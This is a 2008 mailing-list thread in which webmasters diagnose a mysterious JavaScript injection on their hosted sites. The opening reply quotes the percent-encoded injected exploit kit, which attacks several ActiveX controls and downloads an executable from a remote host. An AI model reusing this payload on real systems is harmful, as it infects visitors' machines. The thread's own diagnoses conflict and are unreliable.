b%20%27%2d%36%29%2f%32%29%3b%27%29%3b%0d%0a%09%09%7d%0d%0a%09%7d%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%61%6c%6c%6f%63%28%61%72%67%2c%20%74%61%67%29%0d%0a%7b%0d%0a%09%76%61%72%20%73%69%7a%65%3b%0d%0a%0d%0a%09%73%69%7a%65%20%3d%20%61%72%67%3b%0d%0a%0d%0a%09%69%66%20%28%73%69%7a%65%20%3d%3d%20%33%32%20%7c%7c%20%73%69%7a%65%20%3d%3d%20%36%34%20%7c%7c%20%73%69%7a%65%20%3d%3d%20%32%35%36%20%7c%7c%20%73%69%7a%65%20%3d%3d%20%33%32%37%36%38%29%20%7b%7d%0d%0a%0d%0a%09%69%66%20%28%20%21%20%6d%65%6d%6f%5b%74%61%67%5d%20%29%0d%0a%09%09%6d%65%6d%6f%5b%74%61%67%5d%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0d%0a%0d%0a%09%76%61%72%20%6c%65%6e%20%3d%20%6d%65%6d%6f%5b%74%61%67%5d%2e%6c%65%6e%67%74%68%3b%0d%0a%0d%0a%09%6d%65%6d%6f%5b%74%61%67%5d%5b%6c%65%6e%5d%20%3d%20%70%61%64%64%69%6e%67%2e%73%75%62%73%74%72%28%30%2c%20%28%61%72%67%2d%36%29%2f%32%29%3b%0d%0a%7d%0d%0a%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%61%6c%6c%6f%63%5f%73%74%72%28%61%72%67%2c%20%74%61%67%29%0d%0a%7b%0d%0a%09%76%61%72%20%73%69%7a%65%3b%0d%0a%0d%0a%09%73%69%7a%65%20%3d%20%34%20%2b%20%61%72%67%2e%6c%65%6e%67%74%68%2a%32%20%2b%20%32%3b%0d%0a%0d%0a%09%69%66%20%28%73%69%7a%65%20%3d%3d%20%33%32%20%7c%7c%20%73%69%7a%65%20%3d%3d%20%36%34%20%7c%7c%20%73%69%7a%65%20%3d%3d%20%32%35%36%20%7c%7c%20%73%69%7a%65%20%3d%3d%20%33%32%37%36%38%29%20%7b%7d%0d%0a%0d%0a%09%69%66%20%28%20%21%20%6d%65%6d%6f%5b%74%61%67%5d%29%0d%0a%09%09%6d%65%6d%6f%5b%74%61%67%5d%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0d%0a%0d%0a%09%76%61%72%20%6c%65%6e%20%3d%20%6d%65%6d%6f%5b%74%61%67%5d%2e%6c%65%6e%67%74%68%3b%0d%0a%09%6d%65%6d%6f%5b%74%61%67%5d%5b%6c%65%6e%5d%20%3d%20%61%72%67%2e%73%75%62%73%74%72%28%30%2c%20%61%72%67%2e%6c%65%6e%67%74%68%29%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%66%72%65%65%28%74%61%67%29%20%7b%20%0d%0a%09%64%65%6c%65%74%65%20%6d%65%6d%6f%5b%74%61%67%5d%3b%0d%0a%09%43%6f%6c%6c%65%63%74%47%61%72%62%61%67%65%28%29%3b%0d%0a%09%66%6c%75%73%68%28%29%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%68%65%78%28%6e%75%6d%2c%20%77%69%64%74%68%29%0d%0a%7b%0d%0a%09%76%61%72%20%64%69%67%69%74%73%20%3d%20%22%30%31%32%33%34%35%36%37%38%39%41%42%43%44%45%46%22%3b%0d%0a%0d%0a%09%76%61%72%20%68%65%78%20%3d%20%64%69%67%69%74%73%2e%73%75%62%73%74%72%28%6e%75%6d%20%26%20%30%78%46%2c%20%31%29%3b%0d%0a%0d%0a%09%77%68%69%6c%65%20%28%6e%75%6d%20%3e%20%30%78%46%29%20%7b%0d%0a%09%09%6e%75%6d%20%3d%20%6e%75%6d%20%3e%3e%3e%20%34%3b%0d%0a%09%09%68%65%78%20%3d%20%64%69%67%69%74%73%2e%73%75%62%73%74%72%28%6e%75%6d%20%26%20%30%78%46%2c%20%31%29%20%2b%20%68%65%78%3b%0d%0a%09%7d%0d%0a%0d%0a%09%76%61%72%20%77%69%64%74%68%20%3d%20%28%77%69%64%74%68%20%3f%20%77%69%64%74%68%20%3a%20%30%29%3b%0d%0a%0d%0a%09%77%68%69%6c%65%20%28%68%65%78%2e%6c%65%6e%67%74%68%20%3c%20%77%69%64%74%68%29%0d%0a%09%09%68%65%78%20%3d%20%22%30%22%20%2b%20%68%65%78%3b%0d%0a%0d%0a%09%72%65%74%75%72%6e%20%68%65%78%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%61%64%64%72%20%28%61%64%64%72%29%20%7b%0d%0a%09%72%65%74%75%72%6e%20%75%6e%65%73%63%61%70%65%28%22%25%75%22%20%2b%20%68%65%78%28%61%64%64%72%20%26%20%30%78%46%46%46%46%2c%20%34%29%20%2b%20%22%25%75%22%20%2b%20%68%65%78%28%28%61%64%64%72%20%3e%3e%20%31%36%29%20%26%20%30%78%46%46%46%46%2c%20%34%29%29%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%56%4d%4c%32%28%29%20%7b%0d%0a%0d%0a%09%74%72%79%20%7b%09%0d%0a%09%09%76%61%72%20%74%61%72%67%65%74%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%22%44%69%72%65%63%74%41%6e%69%6d%61%74%69%6f%6e%2e%50%61%74%68%43%6f%6e%74%72%6f%6c%22%29%3b%0d%0a%09%09%69%6e%69%74%28%29%3b%0d%0a%09%09%76%61%72%20%6a%6d%70%65%63%78%20%3d%20%30%78%30%63%30%63%30%63%30%63%3b%0d%0a%09%0d%0a%09%09%76%61%72%20%76%74%61%62%6c%65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%39%30%39%30%25%75%37%63%65%62%22%29%3b%0d%0a%0d%0a%09%09%66%6f%72%20%28%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%31%32%34%2f%34%3b%20%69%2b%2b%29%0d%0a%09%09%09%76%74%61%62%6c%65%20%2b%3d%20%61%64%64%72%28%6a%6d%70%65%63%78%29%3b%0d%0a%0d%0a%09%09%76%74%61%62%6c%65%20%2b%3d%20%70%61%64%64%69%6e%67%2e%73%75%62%73%74%72%28%30%2c%20%28%31%30%30%38%2d%31%33%38%29%2f%32%29%3b%0d%0a%0d%0a%09%09%76%61%72%20%66%61%6b%65%4f%62%6a%50%74%72%20%3d%20%68%65%61%70%42%61%73%65%20%2b%20%30%78%36%38%38%20%2b%20%28%28%31%30%30%38%2b%38%29%2f%38%29%2a%34%38%3b%0d%0a%09%09%76%61%72%20%66%61%6b%65%4f%62%6a%43%68%75%6e%6b%20%3d%20%70%61%64%64%69%6e%67%2e%73%75%62%73%74%72%28%30%2c%20%28%30%78%32%30%30%63%2d%34%29%2f%32%29%20%2b%20%61%64%64%72%28%66%61%6b%65%4f%62%6a%50%74%72%29%20%2b%20%70%61%64%64%69%6e%67%2e%73%75%62%73%74%72%28%30%2c%20%31%34%2f%32%29%3b%0d%0a%0d%0a%09%09%43%6f%6c%6c%65%63%74%47%61%72%62%61%67%65%28%29%3b%0d%0a%09%09%66%6c%75%73%68%28%29%3b%0d%0a%0d%0a%09%09%66%6f%72%20%28%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%31%30%30%3b%20%69%2b%2b%29%0d%0a%09%09%09%61%6c%6c%6f%63%5f%73%74%72%28%76%74%61%62%6c%65%29%3b%0d%0a%0d%0a%09%09%61%6c%6c%6f%63%5f%73%74%72%28%76%74%61%62%6c%65%2c%20%22%6c%6f%6f%6b%61%73%69%64%65%22%29%3b%0d%0a%09%09%66%72%65%65%28%22%6c%6f%6f%6b%61%73%69%64%65%22%29%3b%0d%0a%0d%0a%09%09%66%6f%72%20%28%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%31%30%30%3b%20%69%2b%2b%29%0d%0a%09%09%09%61%6c%6c%6f%63%28%30%78%32%30%31%30%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0d%0a%09%09%66%6f%72%20%28%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%32%3b%20%69%2b%2b%29%20%7b%0d%0a%20%20%20%20%20%20%20%20%09%09%61%6c%6c%6f%63%5f%73%74%72%28%66%61%6b%65%4f%62%6a%43%68%75%6e%6b%29%3b%0d%0a%09%20%20%20%20%20%20%20%20%09%61%6c%6c%6f%63%5f%73%74%72%28%66%61%6b%65%4f%62%6a%43%68%75%6e%6b%2c%20%22%66%72%65%65%4c%69%73%74%22%29%3b%0d%0a%09%09%7d%0d%0a%0d%0a%09%09%61%6c%6c%6f%63%5f%73%74%72%28%66%61%6b%65%4f%62%6a%43%68%75%6e%6b%29%3b%0d%0a%09%09%66%72%65%65%28%22%66%72%65%65%4c%69%73%74%22%29%3b%0d%0a%09%09%73%65%74%53%70%49%64%28%37%29%3b%0d%0a%0d%0a%09%09%74%61%72%67%65%74%2e%4b%65%79%46%72%61%6d%65%28%30%78%34%30%30%30%30%38%30%31%2c%20%6e%65%77%20%41%72%72%61%79%28%31%29%2c%20%6e%65%77%20%41%72%72%61%79%28%31%29%29%3b%0d%0a%0d%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0d%0a%0d%0a%09%72%65%74%75%72%6e%20%30%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%51%75%69%63%6b%54%69%6d%65%28%29%0d%0a%7b%0d%0a%09%76%61%72%20%71%74%66%6c%67%20%3d%20%30%3b%0d%0a%09%76%61%72%20%71%74%73%72%63%20%3d%20%27%27%3b%0d%0a%0d%0a%09%66%6f%72%28%76%61%72%20%69%3d%34%3b%69%3c%3d%38%3b%69%2b%2b%29%20%7b%0d%0a%09%09%74%72%79%20%7b%0d%0a%09%09%09%76%61%72%20%71%74%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%51%75%69%63%6b%54%69%6d%65%2e%51%75%69%63%6b%54%69%6d%65%2e%27%20%2b%20%69%29%3b%0d%0a%09%09%09%69%66%20%28%71%74%29%20%7b%0d%0a%09%09%09%09%69%66%20%28%69%3d%3d%34%29%0d%0a%09%09%09%09%7b%0d%0a%09%09%09%09%09%71%74%66%6c%67%20%3d%20%27%37%27%3b%0d%0a%09%09%09%09%09%71%74%73%72%63%20%3d%20%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%73%72%63%22%20%76%61%6c%75%65%3d%22%68%74%74%70%3a%2f%2f%63%6f%6c%6f%31%32%2e%6e%65%6f%74%72%69%64%65%78%2e%63%6f%6d%2f%57%53%54%70%39%4c%78%58%2f%58%41%58%79%63%6d%57%43%42%37%51%31%31%51%42%32%2e%71%74%6c%22%3e%27%3b%0d%0a%09%09%09%09%7d%0d%0a%09%09%09%09%65%6c%73%65%0d%0a%09%09%09%09%7b%0d%0a%09%09%09%09%09%71%74%66%6c%67%20%3d%20%27%38%27%3b%0d%0a%09%09%09%09%09%71%74%73%72%63%20%3d%20%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%73%72%63%22%20%76%61%6c%75%65%3d%22%68%74%74%70%3a%2f%2f%63%6f%6c%6f%31%32%2e%6e%65%6f%74%72%69%64%65%78%2e%63%6f%6d%2f%63%70%75%43%48%71%76%48%2f%4e%79%6d%41%51%32%54%7a%7a%41%36%74%4c%4e%4a%63%2e%6d%6f%76%22%3e%27%3b%0d%0a%09%09%09%09%7d%0d%0a%09%09%09%09%62%72%65%61%6b%3b%0d%0a%09%09%09%7d%0d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%7d%09%09%09%0d%0a%09%7d%0d%0a%0d%0a%09%69%66%20%28%71%74%66%6c%67%29%20%7b%0d%0a%09%09%76%61%72%20%71%74%68%74%6d%6c%20%3d%09%27%3c%6f%62%6a%65%63%74%20%43%4c%41%53%53%49%44%3d%22%63%6c%73%69%64%3a%30%32%42%46%32%35%44%35%2d%38%43%31%37%2d%34%42%32%33%2d%42%43%38%30%2d%44%33%34%38%38%41%42%44%44%43%36%42%22%20%77%69%64%74%68%3d%22%30%22%20%68%65%69%67%68%74%3d%22%30%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%30%70%78%22%20%6f%6e%6c%6f%61%64%3d%22%61%6c%65%72%74%28%2f%6f%6b%73%73%7a%2f%29%3b%22%3e%27%2b%0d%0a%09%09%09%09%71%74%73%72%63%20%2b%20%0d%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%61%75%74%6f%70%6c%61%79%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e%27%2b%0d%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%6c%6f%6f%70%22%20%76%61%6c%75%65%3d%22%66%61%6c%73%65%22%3e%27%2b%0d%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%63%6f%6e%74%72%6f%6c%6c%65%72%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e%27%2b%0d%0a%09%09%09%09%27%3c%2f%6f%62%6a%65%63%74%3e%27%3b%0d%0a%09%09%09%73%65%74%53%70%49%64%28%69%20%3d%3d%20%34%20%3f%20%36%20%3a%20%31%36%29%3b%0d%0a%09%09%09%76%61%72%20%6d%79%5f%64%69%76%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%64%69%76%22%29%3b%0d%0a%09%09%09%6d%79%5f%64%69%76%2e%69%6e%6e%65%72%48%54%4d%4c%20%3d%20%71%74%68%74%6d%6c%3b%0d%0a%09%09%09%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%6d%79%5f%64%69%76%29%3b%0d%0a%09%7d%0d%0a%0d%0a%09%72%65%74%75%72%6e%20%30%3b%0d%0a%7d%0d%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%53%75%70%65%72%42%75%64%64%79%28%29%20%7b%0d%0a%0d%0a%09%74%72%79%20%7b%0d%0a%09%09%76%61%72%20%62%75%64%64%79%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%53%62%2e%53%75%70%65%72%42%75%64%64%79%2e%31%27%29%3b%0d%0a%0d%0a%09%09%69%66%20%28%62%75%64%64%79%29%20%7b%0d%0a%09%09%09%73%65%74%53%70%49%64%28%39%29%3b%0d%0a%09%09%09%62%75%64%64%79%2e%4c%69%6e%6b%53%42%49%63%6f%6e%73%28%30%78%30%63%30%63%30%63%30%63%29%3b%0d%0a%09%09%7d%0d%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%7d%0d%0a%0d%0a%09%72%65%74%75%72%6e%20%30%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%41%75%64%69%6f%46%69%6c%65%28%29%0d%0a%7b%0d%0a%09%74%72%79%20%7b%0d%0a%09%09%76%61%72%20%6d%6d%65%64%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3b%0d%0a%09%09%6d%6d%65%64%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63%6c%73%69%64%3a%37%37%38%32%39%46%31%34%2d%44%39%31%31%2d%34%30%46%46%2d%41%32%46%30%2d%44%31%31%44%42%38%44%36%44%30%42%43%22%29%3b%0d%0a%0d%0a%09%09%76%61%72%20%6d%6d%73%3d%27%27%3b%0d%0a%09%09%66%6f%72%28%76%61%72%20%69%3d%30%3b%69%3c%34%31%32%30%3b%69%2b%2b%29%20%7b%20%6d%6d%73%20%2b%3d%20%22%41%22%3b%20%7d%0d%0a%09%0d%0a%09%09%73%65%74%53%70%49%64%28%33%29%3b%0d%0a%09%09%6d%6d%73%2b%3d%22%5c%78%30%63%5c%78%30%63%5c%78%30%63%5c%78%30%63%22%3b%0d%0a%09%09%6d%6d%65%64%2e%53%65%74%46%6f%72%6d%61%74%4c%69%6b%65%53%61%6d%70%6c%65%28%6d%6d%73%29%3b%0d%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%47%4f%4d%28%29%0d%0a%7b%0d%0a%09%76%61%72%20%73%55%52%4c%3d%27%27%3b%0d%0a%09%66%6f%72%28%76%61%72%20%69%3d%30%3b%69%3c%35%31%30%3b%69%2b%2b%29%20%7b%0d%0a%09%09%73%55%52%4c%20%2b%3d%20%75%6e%65%73%63%61%70%65%28%22%25%30%63%22%29%3b%0d%0a%09%7d%0d%0a%0d%0a%09%73%65%74%53%70%49%64%28%31%33%29%3b%0d%0a%0d%0a%09%76%61%72%20%47%6f%6d%4d%61%6e%61%67%65%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%47%6f%6d%57%65%62%43%74%72%6c%2e%47%6f%6d%4d%61%6e%61%67%65%72%2e%31%27%29%3b%0d%0a%09%47%6f%6d%4d%61%6e%61%67%65%72%2e%4f%70%65%6e%55%52%4c%28%73%55%52%4c%29%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%57%56%46%28%29%0d%0a%7b%0d%0a%09%73%65%74%53%70%49%64%28%31%32%29%3b%0d%0a%09%66%6f%72%20%28%76%61%72%20%69%3d%30%3b%69%3c%31%32%38%3b%69%2b%2b%29%0d%0a%09%7b%0d%0a%09%09%74%72%79%7b%20%0d%0a%09%09%09%76%61%72%20%74%61%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%2e%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%2e%31%27%29%3b%0d%0a%09%09%09%74%61%72%2e%73%65%74%53%6c%69%63%65%28%30%78%37%66%66%66%66%66%66%65%2c%20%30%78%30%63%30%63%30%63%30%63%2c%20%30%78%30%63%30%63%30%63%30%63%2c%30%78%30%63%30%63%30%63%30%63%29%3b%0d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%7b%7d%0d%0a%09%7d%0d%0a%0d%0a%09%73%65%74%53%70%49%64%28%31%36%29%3b%0d%0a%09%72%65%74%75%72%6e%20%30%3b%0d%0a%7d%0d%0a%0d%0a%69%66%20%28%73%74%61%72%74%4d%44%41%43%28%29%20%7c%7c%20%6d%61%6b%65%53%6c%69%64%65%28%29%20%7c%7c%20%73%74%61%72%74%56%4d%4c%32%28%29%20%7c%7c%20%73%74%61%72%74%51%75%69%63%6b%54%69%6d%65%28%29%20%7c%7c%20%73%74%61%72%74%53%75%70%65%72%42%75%64%64%79%28%29%20%7c%7c%20%73%74%61%72%74%41%75%64%69%6f%46%69%6c%65%28%29%20%7c%7c%20%73%74%61%72%74%47%4f%4d%28%29%20%7c%7c%20%73%74%61%72%74%57%56%46%28%29%29%20%7b%7d%0d%0a%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%0d%0a%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%27%63%6c%73%69%64%3a%32%34%46%33%45%41%44%36%2d%38%42%38%37%2d%34%43%31%41%2d%39%37%44%41%2d%37%31%43%31%32%36%42%44%41%30%38%46%27%20%69%64%3d%27%79%61%68%38%27%3e%3c%2f%6f%62%6a%65%63%74%3e%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61%73%63%72%69%70%74%22%3e%20%74%72%79%20%7b%20%79%61%68%38%2e%47%65%74%46%69%6c%65%28%20%20')
+
32MU2 +
33unescape
('%2c%22%63%3a%5c%5c%6d%6f%73%76%73%38%2e%65%78%65%22%2c%35%2c%31%2c%22%6d%6f%73%76%73%38%22%29%3b%20%7d%20%63%61%74%63%68%28%65%29%7b%20%7d%3c%2f%73%63%72%69%70%74%3e%0a%0a%3c%2f%62%6f%64%79%3e%0a%3c%2f%68%74%6d%6c%3e%0a%0a');
34
35document.write (SB);
36
37
</script>


Something injecting code via PHP it appears. So I'd guess that one of
the PHP modules is infected, or they are doing something clever with
some sort of mod_rewrite (but I'd go for the PHP)...

But I'd defintely tell your web host about it, or if your own server,
re-image it.
I'd also take the site down until you can fix it rather than risk
infecting those that do visit...

And unless you chose the exact same time to fix it as I scanned the
site, it blocked my IP eventually... and didn't serve the content
malware to me....


Murdoch

unread,
Jan 13, 2008, 10:37:37 PM1/13/08
to stopbadware
That's the script I found too. I do not think a reinstall will help.
This is clearly the result of a security hole. Odds are as soon as you
have done a reinstall you'll get infected again.

SteveW

unread,
Jan 14, 2008, 4:47:39 AM1/14/08
to stopbadware
On Jan 13, 3:03 pm, Flattery <rob...@hickorytech.net> wrote:
> That is odd.  It does not show up on my computer when I view source...
> but thank you it gives me some direction.

When you're investigating your own site, never use View Source in your
browser. Go straight to the source code file on the server.

Chris Wright

unread,
Jan 14, 2008, 5:01:04 AM1/14/08
to stopb...@googlegroups.com
Murdoch wrote:
> That's the script I found too. I do not think a reinstall will help.
> This is clearly the result of a security hole. Odds are as soon as you
> have done a reinstall you'll get infected again.
>
>

Not necessarily so, it could be that they gained root access via an RFI
vulnerability, but obviously you need to close the door first before
going live with the site again.
(Note I said not necessarily, it could have been a security hole in
apache/php/perl/mysql or whatever on the server itself, OR, it could be
a hole in an application installed on the server (forum, blog, etc), OR,
it could be compromised already at root level by password cracking...
The point being, too many methods of entry to be sure, but we all agree
you need to find the door as your second priority, and then close it
before even thinking of bringing the site back up... (First priority,
take the site down))

Chris

Murdoch

unread,
Jan 14, 2008, 7:24:46 AM1/14/08
to stopbadware
In the case of this infection, such a course of action is not
possible. The javascript injection comes and goes. As soon as you
notice it in a file it will be gone from the file by the time you
bring the file up from the server. I have only got as far as I have by
viewing the source in Firefox and it's cache.

Murdoch

unread,
Jan 14, 2008, 7:30:26 AM1/14/08
to stopbadware
Our server was restored from backups just recently. The whole HD was
replaced. Did not help. The only PHP code is stuff I have developed
myself, nothing public, and I can tell from the way the javascript
injections are appearing it is not to blame. The code is coming out in
a part of the page not controlled by my system, and obviously this
Garden Party Fibers site is not powered by my system. That's why I am
trying to see if we can isolate a common denominater piece of
software.

Flattery

unread,
Jan 14, 2008, 8:01:52 AM1/14/08
to stopbadware
> When you're investigating your own site, never use View Source in your
> browser. Go straight to the source code file on the server.

There is nothing in the file at this point... I am thinking that the
server is injecting the code after the body tag on the fly.


> My server too has been infected by this exploit. We should compare
> software version lists. If there is a common piece of software, that
> means it is the likely culprit.
>
> The server is running cPanel 11.16.0-R18546 with PHP 4.4.7, MySQL
> 4.1.22, Apache 2.0.61, and Perl 5.8.8.

Server details are:
Apache version 1.3.39 (Unix)
MySQL version 4.1.22-standard
cPanel Version 11.16.0-STABLE_18450
PHP version 4.4.7
Perl version 5.8.8


Thanks

Chris Wright

unread,
Jan 14, 2008, 8:38:39 AM1/14/08
to stopb...@googlegroups.com
Do you host directly with Soft Layer or via a 3rd party reseller?

There are 395 other domains hosted on the same server has yours, so it would be interesting to see if any of those are affected as well.
(which would indicate that one of the core modules above has been compromised).

I have seen problems with Soft Layer before where a whole server has been compromised, but IIRC that was with people buying a dedicated server and hosting multiple domains (as a reseller) rather than Soft Layer shared hosting.  (Those buying dedicated servers are usually responsible for the update and patching of the core modules which is why they tend to fall behind).

I can send a list of the 395 other domains 'off-list' rather than make it public here if anyone is interested
(or you can go to http://www.linkvendor.com/seo-tools/domains-from-ip.html and grab the list yourself).

** Murdoch: Who are you hosted with? (Or what is your domain name ?)

Regards

Chris

SteveW

unread,
Jan 14, 2008, 9:02:15 AM1/14/08
to stopbadware
Murdoch and Flattery,

Are both these sites run by a CMS, so the page data is stored in a
database? If so, could have been an SQL injection attack, so the bad
code is now stored in the db, being inserted while the page is built.

Jart

unread,
Jan 14, 2008, 9:24:47 AM1/14/08
to stopbadware
Hi All,

Yes can confirm the inline javascript hxxp: gardenpartyfibers(dot)com/
xsxvp(dot)js - this:

(a) Is a MITM (man in the middle) SQL DB injection, but is plugged via
a weakness in PHP - PHP recommend server upgrade to version 5.2.1 -
contact your host to upgrade after cleansing.

(b) When decoded the obscured script, it is trying to inject
"mosvs8(dot)exe" as a nasty drive by user exploitation. This was only
first detected on Jan 13th see JS_IESLICE.AQ on Trend
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=JS%5FIESLICE%2EAQ&VSect=P

Suggest:

1. Ensure your PC is not infected with this first

2. Upgrade PHP

3. Check every file on your server with a secure FTP, it it there
somewhere as a MySQL Db call - delete and secure the directories,

4. Pass on above to host to ensure prevention.


Hope this helps

Jart

Flattery

unread,
Jan 14, 2008, 5:29:00 PM1/14/08
to stopbadware
So it is not the server injecting it after the <body> tag? I tried to
remove the body tag for now to see if it goes away, but unfortunately
like I said... I cannot see the injection from my computer, but I have
seen it in search engine caches so I do know that it was there.

can anyone confirm that it is still showing up without the <body> tag?



Nothing shows up in the database like this and there is nothing in the
file after the <body> tag that I can see could inject it with. Also
as I have temporarily removed the <body> tag I don't know if it is
still injecting or where it is injecting it now.

I am working with my hoster to fix the problem, but they don't offer
the best service.


On Jan 14, 8:24 am, Jart <jart...@googlemail.com> wrote:
> Hi All,
>
> Yes can confirm the inline javascript hxxp: gardenpartyfibers(dot)com/
> xsxvp(dot)js - this:
>
> (a) Is a MITM (man in the middle) SQL DB injection, but is plugged via
> a weakness in PHP - PHP recommend server upgrade to version 5.2.1 -
> contact your host to upgrade after cleansing.
>
> (b) When decoded the obscured script, it is trying to inject
> "mosvs8(dot)exe" as a nasty drive by user exploitation. This was only
> first detected on Jan 13th see JS_IESLICE.AQ on Trendhttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=JS%5F...

Murdoch

unread,
Jan 14, 2008, 6:06:33 PM1/14/08
to stopbadware
I can confirm that removing the body tag doesn't help. Tried it,
failed.

I have scanned my the database of my CMS (which is completely custom
and also hidden, it never exposes it's GET parameters or even a .PHP
extension, all hidden with rewrite rules in HTML files) for rogue
code, of which there is not a trace. Additionally, pages on the server
that have no PHP code at all are being hit.

The comments on this article show that PHP versoins as recent as 5.2.5
are affected.

http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/comments/#c_130431

Chris Wright

unread,
Jan 14, 2008, 6:25:22 PM1/14/08
to stopb...@googlegroups.com
Murdoch wrote:
> I can confirm that removing the body tag doesn't help. Tried it,
> failed.
>
> I have scanned my the database of my CMS (which is completely custom
> and also hidden, it never exposes it's GET parameters or even a .PHP
> extension, all hidden with rewrite rules in HTML files) for rogue
> code, of which there is not a trace. Additionally, pages on the server
> that have no PHP code at all are being hit.
>
> The comments on this article show that PHP versoins as recent as 5.2.5
> are affected.
>
> http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/comments/#c_130431
>
>

Murdoch: Which hosting company are you with? (Or what is the IP / URL
of your site?)
You can email me this information off-list if you want to keep it from
public view.
Does your site also run on shared hosting?

Regards

Chris

Murdoch

unread,
Jan 15, 2008, 9:51:05 PM1/15/08
to stopbadware
That info won't help Chris. This is not an SQL injection attack, but a
rootkit installed due to a Linux kernel flaw. Several different Linux
variants are afffected.

http://forums.cpanel.net/showthread.php?p=348503
http://www.cpanel.net/security/notes/random_js_toolkit.html

On Jan 15, 12:25 pm, Chris Wright <chris.a.wri...@gmail.com> wrote:
> Murdoch wrote:
> > I can confirm that removing the body tag doesn't help. Tried it,
> > failed.
>
> > I have scanned my the database of my CMS (which is completely custom
> > and also hidden, it never exposes it's GET parameters or even a .PHP
> > extension, all hidden with rewrite rules in HTML files) for rogue
> > code, of which there is not a trace. Additionally, pages on the server
> > that have no PHP code at all are being hit.
>
> > The comments on this article show that PHP versoins as recent as 5.2.5
> > are affected.
>
> >http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/comm...

Chris Wright

unread,
Jan 16, 2008, 4:02:13 AM1/16/08
to stopb...@googlegroups.com
Chris Wright wrote:
> Murdoch: Which hosting company are you with? (Or what is the IP / URL
> > of your site?)
> > You can email me this information off-list if you want to keep it from
> > public view.
> > Does your site also run on shared hosting?

Murdoch wrote:
> That info won't help Chris. This is not an SQL injection attack, but a
> rootkit installed due to a Linux kernel flaw. Several different Linux
> variants are afffected.
>
> http://forums.cpanel.net/showthread.php?p=348503
> http://www.cpanel.net/security/notes/random_js_toolkit.html
>
>

I just wanted to know what hosting provider you are with to see if it's
one of the good guys (obviously not a particularly good one if they
allowed their systems to fall foul).

We were trying to find a common link, not only in software/OS etc, but
in web hosts.
Not a problem if you don't want to share, it was only out of interest
more than anything else.

Regards

Chris

Murdoch

unread,
Jan 16, 2008, 3:33:45 PM1/16/08
to stopbadware
The only common factor I can see is that it affects Linux derivatives
- Fedora, Red Hat and CentOS seem to be the big ones affected. To be
honest, I do not know who our web host is. My boss has contact with
the data centre we use, not me. We run our own dedicated server for
our clients and resellers.

They are one of those data centres that will do as little as
practically possible to help clients, will charge you for everything
and anything, but curiously back down relatively easily when pressed
if the charge is challenged on moral grounds. For example, we recently
set up a second server to split the data load, with a new control
panel called ServerCP. We also wanted to test it to see if it was a
viable replacement for the much more expensive cPanel. It has since
proven itself faulty (the name servers don't set up right) and we have
had to trash it and reinstall cPanel. They were going to charge us US
$65 to do so. The boss challenged that, saying they effectively sold
us a faulty product in the form of ServerCP, so they then said they
would do it for free.

We hope to be able to reformat at least one server with FreeBSD
